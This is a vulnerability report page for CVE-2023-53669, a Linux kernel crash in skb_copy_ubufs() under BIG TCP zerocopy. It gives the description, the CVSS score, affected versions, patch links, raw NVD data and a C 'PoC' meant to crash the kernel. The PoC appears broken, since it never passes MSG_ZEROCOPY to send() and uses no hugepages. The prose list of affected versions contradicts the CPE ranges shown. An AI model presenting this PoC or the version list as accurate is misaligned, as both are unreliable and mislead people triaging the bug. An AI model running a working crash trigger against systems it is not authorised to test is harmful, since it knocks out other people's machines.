Security Vulnerability Report
CVE-2023-53669 CVSS 5.5 MEDIUM

CVE-2023-53669

Published: 2025-10-07 16:15:51
Last Modified: 2026-02-26 23:14:24
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

tcp: fix skb_copy_ubufs() vs BIG TCP

David Ahern reported crashes in skb_copy_ubufs() caused by TCP tx zerocopy using hugepages, and skb length bigger than ~68 KB.

skb_copy_ubufs() assumed it could copy all payload using up to MAX_SKB_FRAGS order-0 pages.

This assumption broke when BIG TCP was able to put up to 512 KB per skb.

We did not hit this bug at Google because we use CONFIG_MAX_SKB_FRAGS=45 and limit gso_max_size to 180000.

A solution is to use higher order pages if needed.

v2: add missing __GFP_COMP, or we leak memory.
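The size limit in the description, worked through as an added example (a userspace model written for this page, not the kernel's code or the patch). It assumes 4 KiB pages and a MAX_SKB_FRAGS of 17, which gives the ~68 KB figure; the function names are hypothetical.

```c
#include <stdio.h>
#include <stddef.h>

#define PAGE_SIZE_BYTES 4096UL   /* assumption: 4 KiB base pages */

/* Largest payload that fits in max_frags pages of the given order. */
static size_t frag_capacity(unsigned max_frags, unsigned order)
{
    return (PAGE_SIZE_BYTES << order) * max_frags;
}

/* Smallest page order at which max_frags pages can hold len bytes:
 * the "use higher order pages if needed" idea. Requires max_frags > 0. */
static unsigned min_page_order(size_t len, unsigned max_frags)
{
    unsigned order = 0;
    while (frag_capacity(max_frags, order) < len)
        order++;
    return order;
}

/* Number of pages of the given order needed to hold len bytes. */
static unsigned frags_needed(size_t len, unsigned order)
{
    size_t psize = PAGE_SIZE_BYTES << order;
    return (unsigned)((len + psize - 1) / psize);
}

int main(void)
{
    /* Constructed cases taken from the figures in the description. */
    struct { const char *name; size_t len; unsigned max_frags; } cases[] = {
        { "17 frags, 64 KiB skb",       64UL * 1024,  17 },
        { "17 frags, BIG TCP 512 KiB",  512UL * 1024, 17 },
        { "45 frags, gso_max 180000",   180000UL,     45 },
    };
    for (size_t i = 0; i < sizeof(cases) / sizeof(cases[0]); i++) {
        unsigned o = min_page_order(cases[i].len, cases[i].max_frags);
        printf("%-28s order-0 cap=%zu need(order 0)=%u min order=%u frags=%u\n",
               cases[i].name, frag_capacity(cases[i].max_frags, 0),
               frags_needed(cases[i].len, 0), o,
               frags_needed(cases[i].len, o));
    }
    return 0;
}
```

The second case shows the broken assumption (128 order-0 pages needed against a limit of 17), and the third shows why a 45-fragment limit with gso_max_size 180000 never left order 0.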

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

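cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.19 including, up to 6.1.29 excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 including, up to 6.2.16 excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.3 including, up to 6.3.3 excluding) - VULNERABLE
Linux Kernel < 6.6 (versions affected by the BIG TCP feature)
Linux Kernel 6.1.x (check the specific patch version)
Linux Kernel 6.2.x (check the specific patch version)
Linux Kernel 6.3.x (check the specific patch version)
Linux Kernel 6.4.x (check the specific patch version)
Linux Kernel 6.5.x (check the specific patch version)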

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2023-53669 PoC - Linux Kernel TCP skb_copy_ubufs crash
 * Trigger condition: BIG TCP + SO_ZEROCOPY + hugepages + skb > ~68KB
 *
 * This PoC demonstrates how to trigger the vulnerability by sending
 * large data via TCP zerocopy on a system with BIG TCP enabled.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>   // inet_addr()

#define BUFFER_SIZE (256 * 1024)  // 256KB, exceeds ~68KB limit
#define SERVER_PORT 9999

int main(int argc, char *argv[])
{
    int sockfd;
    struct sockaddr_in server_addr;
    char *buffer;
    int ret;

    // Allocate large buffer (must be page-aligned for zerocopy)
    ret = posix_memalign((void **)&buffer, 4096, BUFFER_SIZE);
    if (ret != 0) {
        perror("posix_memalign");
        return -1;
    }

    // Fill buffer with data
    memset(buffer, 'A', BUFFER_SIZE);

    // Create TCP socket
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("socket");
        free(buffer);
        return -1;
    }

    // Enable SO_ZEROCOPY for zero-copy transmission
    int zerocopy = 1;
    if (setsockopt(sockfd, SOL_SOCKET, SO_ZEROCOPY, &zerocopy, sizeof(zerocopy)) < 0) {
        perror("setsockopt SO_ZEROCOPY");
        // Continue anyway - may still trigger on some configs
    }

    // Connect to server (requires a TCP listener on SERVER_PORT)
    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(SERVER_PORT);
    server_addr.sin_addr.s_addr = inet_addr("127.0.0.1");

    if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("connect");
        close(sockfd);
        free(buffer);
        return -1;
    }

    // Send large data via zerocopy - triggers skb_copy_ubufs()
    // with skb size > MAX_SKB_FRAGS * PAGE_SIZE (~68KB)
    ssize_t sent = send(sockfd, buffer, BUFFER_SIZE, 0);
    if (sent < 0) {
        perror("send");
    } else {
        printf("Sent %zd bytes via zerocopy\n", sent);
    }

    close(sockfd);
    free(buffer);
    return 0;
}

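References

https://git.kernel.org/stable/c/3c77a377877acbaf03cd7caa21d3644a5dd16301 (Patch)
https://git.kernel.org/stable/c/7e692df3933628d974acb9f5b334d2b3e885e2a6 (Patch)
https://git.kernel.org/stable/c/7fa93e39fbb0566019c388a8038a4d58552e0910 (Patch)
https://git.kernel.org/stable/c/9cd62f0ba465cf647c7d8c2ca7b0d99ea0c1328f (Patch)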

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53669", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.770", "lastModified": "2026-02-26T23:14:23.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: fix skb_copy_ubufs() vs BIG TCP\n\nDavid Ahern reported crashes in skb_copy_ubufs() caused by TCP tx zerocopy\nusing hugepages, and skb length bigger than ~68 KB.\n\nskb_copy_ubufs() assumed it could copy all payload using up to\nMAX_SKB_FRAGS order-0 pages.\n\nThis assumption broke when BIG TCP was able to put up to 512 KB per skb.\n\nWe did not hit this bug at Google because we use CONFIG_MAX_SKB_FRAGS=45\nand limit gso_max_size to 180000.\n\nA solution is to use higher order pages if needed.\n\nv2: add missing __GFP_COMP, or we leak memory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.19", "versionEndExcluding": "6.1.29", "matchCriteriaId": "573E342E-2B55-4488-86DF-4C7FD5453C75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.16", "matchCriteriaId": "F92F7C8E-A977-4255-B1B6-D1908D8B408F"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.3", "matchCriteriaId": "6D96A7FC-D812-4458-AEA8-3FF4023E6B75"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3c77a377877acbaf03cd7caa21d3644a5dd16301", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7e692df3933628d974acb9f5b334d2b3e885e2a6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7fa93e39fbb0566019c388a8038a4d58552e0910", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9cd62f0ba465cf647c7d8c2ca7b0d99ea0c1328f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}